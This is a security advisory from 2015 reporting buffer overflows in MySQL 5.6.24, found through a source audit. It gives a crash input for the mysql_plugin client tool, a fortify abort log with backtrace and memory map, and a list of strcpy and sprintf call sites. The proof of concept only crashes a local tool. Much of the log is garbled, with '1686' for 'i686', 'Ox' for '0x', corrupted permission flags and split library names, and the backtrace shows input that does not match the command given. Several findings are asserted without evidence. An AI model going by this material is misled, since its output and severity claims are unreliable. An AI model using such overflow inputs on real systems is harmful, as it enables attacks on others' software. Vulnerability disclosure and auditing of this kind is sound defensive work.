===========================================================
Advanced Information Security Corporation
Security Advisory
===========================================================
a888b.
d888888b.
8P"YP"Y88
8|o||o|88
8' - .88
8`._.' Y8.
d/ `8b.
dP . Y8b.
d8:' " `::88b
d8" 'Y88b
:8P ' :888
8a. : _a88P
._/"Yaa_: .| 88P|
YP" `| 8P `.
/ .___.d| .'
`--..__)888P`._.'
~ Keeping Things Simple!
MySQL v5.6.24 BUFFER OVERFLOWS
Date: 07/10/2015
Author: Nicholas Lemonias
============================================================
========================
SUMMARY
=========================
During a manual source code audit of MYSQL Version 5.6.24, various
buffer overflow issues have been realized.
===================
TECHNICAL DETAILS
===================
root@priv8: ~# /usr/bin/mysql_plugin ‘perl -e ‘print “X” x 9000"
*** buffer overflow detected ***: mysql_plugin terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5]
/lib/1386-linux-gnu/1686/cmov/libc.so.6(+0xf838a)[0xb729938a]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
insecure call
mysql_plugin(main+0x202)[0xb752ee22]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa63]
mysql_plugin(+0xa90d)[0xb752f90d]
======= Memory map: ========
b6800000-b6821000 nw-p 00000000 00:00
b6821000-b6900000 ---p 00000000 00 00
b699d000-b699e000 ---p 00000000 00:00
b699e000-b71a1000 rw-p 00000000 00 00
b71a1000-b7345000 r-xp 00000000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.50
b7345000-b7347000 r-—p 001a4000 00:13 1673
/lib/i386-linux~gnu/i686/cmov/libc-2.1
9.so
b7347000-b7348000 rw-p 00la6000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.so
b7348000-b734b000 rw-p 00000000 00 00 0
b734b000-b7367000 r-xp 00000000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7367000-b7368000 rw-p 0001b000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7368000—b73ac000 r-xp 00000000 00:13 15649
/lib/i386-linux-gnu/1686/cmov/libm-2.1
9.so
bffc9000-c0000000 pw-p 00000000 00:00 0 [stack]
Program received signal SIGABRT, Aborted.
Oxb7fdebe0 in __kernel_vsyscall ()
(gdb) bt
#0 0xb7fdebe0 in __kernel_vsyscall ()
#1 0xb7caa307 in __GI_raise (sig=sig@entry=6)
at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2 0xb7cab9c3 in __GI_abort () at abort.c:89
#3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2,
fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminatedn”)
at ../sysdeps/posix/libc_fatal.c:175
#4 0xb7d762d5 in __GI___fortify_fail (
msg=msg@entry=0xb7ddbdd6 "buffer overflow detected”)
at fortify_fail.c:31
#5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28
#6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' <repeats 200 times>...,
src=0xbffe96ed 'A' <repeats 200 times>..., destlen=<optimized out>)
at strcpy_chk.c:60
#7 0x80009e22 in main ()
(gdb)
(gdb) disas
Dump of assembler code for function __kernel_vsyscall:
0xb7fdebd0 <+0>: push %ecx
0xb7fdebd1 <+1>: push %edx
Oxb7fdebd2 <+2>: push %ebp
Oxb7fdebd3 <+3>: mov %esp,%ebp
0xb7fdebd5 <+5>: sysenter
Oxb7fdebd7 <+7>: nop
Oxb7fdebd8 <+8>: nop
0xb7fdebd9 <+9>: nop
Oxb7fdebda <+10>: nop
Oxb7fdebdb <+11>: nop
Oxb7fdebdc <+12>: nop
Oxb7fdebdd <+13>: nop
Oxb7fdebde <+14>: int x80
=> Oxb7fdebe0 <+16>: pop %ebp
Oxb7fdebe1 <+17>: pop %edx
0xb7fdebe2 <+18>: pop %ecx
Oxb7fdebe3 <+19>: ret
End of assembler dump.
(gdb)
============================
TECHNICAL SYNOPSIS / POC #2
============================
Unsafe Use of strcpy; this can lead to a buffer overflow condition
----->
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
A user-supplied string from the command-line is copied to a fixed
length destination buffer.
-----------------[ mysql_plugin.c]-------------------------------
Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);
permission set:
-rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin
===============================================
MySQL V 5.6.24 VULNERABILITIES - SOURCE CODE
===============================================
1. Insecure use of sprintf
Vulnerability Description: A char* type is copied to a fixed length
destination buffer. This could lead to a buffer overflow.
Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(efbuf, "MY_REG_%s", name);
2.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.
Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);
3.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.
Line: 797 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(config_file, argv[i]);
4.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 544 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched null at `%.20s'", p);
5.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 525 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s'", len, p);
6.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is being copied to a fixed length destination buffer.
This could lead to a buffer overflow.
Line: 413 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/dblqh/redoLogReader/reader.cpp
strcpy(fileName, argv[1]);
7.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 531 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s' instead", len, p);
8.
Insecure use of sprintf.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 710 - Filename: ../mysql/mysql-5.6.24/client/mysqlshow.c
sprintf(query,"select count(*) from `%s`", table);
9.
Insecure use of sprintf
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 121 - Filename: ../mysql/mysql-5.6.24/libmysql/conf_to_src.c
sprintf(buf, "%s.conf", set);
10.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 784 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/PosixAsyncFile.cpp
strcpy(path, src);
11.
Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A char* type is being copied to a fixed
length destination buffer. This, could lead to an overflow.
Line: 377 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/Win32AsyncFile.cpp
strcpy(path, src);
<<<
Size of PATH is PATH_MAX 256